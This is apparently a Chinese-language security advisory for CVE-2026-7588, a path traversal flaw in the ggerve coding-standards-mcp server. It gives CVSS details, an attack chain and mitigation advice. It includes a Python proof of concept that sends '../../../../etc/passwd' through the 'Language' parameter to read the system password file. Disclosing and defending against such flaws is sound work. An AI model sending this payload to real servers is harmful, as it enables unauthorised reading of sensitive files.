CVE-2026-7588 CVSS 5.3 中危

CVE-2026-7588 ggerve产品路径遍历漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7588

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ggerve coding-standards-mcp

漏洞概述

在 ggerve 开发的 coding-standards-mcp 组件中发现一处路径遍历漏洞。该问题源于 server.py 文件中的 get_style_guide 和 get_best_practices 函数未能正确处理用户输入。攻击者可以通过操纵 'Language' 参数，利用路径遍历序列访问服务器上的敏感文件。该漏洞支持远程攻击，且无需认证即可触发。目前该漏洞的利用代码已被公开，且由于产品采用滚动发布模式，具体受影响版本号暂未明确。

技术细节

该漏洞属于典型的路径遍历漏洞。在 server.py 的实现逻辑中，函数 get_style_guide 和 get_best_practices 接收用户提供的 'Language' 参数，并将其直接用于文件系统操作，而未对该参数进行充分的安全校验或过滤特殊字符（如 '../'）。攻击者可以通过在参数中插入 '../' 序列来穿越目录限制，从而读取 Web 根目录之外的任意文件。由于 CVSS 向量显示攻击复杂度低（AC:L）、无需用户交互（UI:N）且无需权限（PR:N），这使得攻击者能够轻易地自动化利用此漏洞获取服务器敏感信息。

攻击链分析

STEP 1

步骤1

攻击者通过网络扫描识别运行 ggerve coding-standards-mcp 的目标服务器。

STEP 2

步骤2

攻击者构造包含路径遍历字符（如 '../'）的恶意 HTTP 请求，将其赋值给 'Language' 参数。

STEP 3

步骤3

服务器端 server.py 处理该请求，直接使用恶意参数读取文件系统。

STEP 4

步骤4

服务器响应返回攻击者请求的敏感文件内容（如配置文件、源代码等）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_url):
    """
    PoC for CVE-2026-7588 Path Traversal in ggerve coding-standards-mcp
    """
    # The vulnerable endpoint is assumed to be handling 'Language' parameter
    # based on the vulnerability description.
    payload = {
        "Language": "../../../../etc/passwd"
    }
    
    try:
        print(f"[+] Sending request to {target_url} with payload: {payload}")
        response = requests.get(target_url, params=payload, timeout=10)
        
        if response.status_code == 200:
            content = response.text
            if "root:" in content:
                print("[!] Vulnerability confirmed! /etc/passwd content leaked:")
                print(content[:200])
            else:
                print("[+] Request sent, but classic signature not found. Check response manually.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://vulnerable-server:port/path" # Replace with actual target
    exploit_poc(target)

影响范围

ggerve coding-standards-mcp (所有版本，具体受影响版本未明确)

防御指南

临时缓解措施

建议在官方修复版本发布前，通过网络访问控制列表（ACL）限制对受影响端口的访问，仅允许可信 IP 连接。同时，可在 Web 应用防火墙（WAF）上添加规则，检测并拦截包含路径遍历特征的请求参数。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7588
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7588
3 Details https://www.cvedetails.com/cve/CVE-2026-7588/
4 VulDB https://vuldb.com/cve/CVE-2026-7588
5 Link https://github.com/ggerve/coding-standards-mcp/
6 Link https://github.com/ggerve/coding-standards-mcp/issues/3
7 Link https://vuldb.com/submit/804390
8 Link https://vuldb.com/vuln/360541
9 Link https://vuldb.com/vuln/360541/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表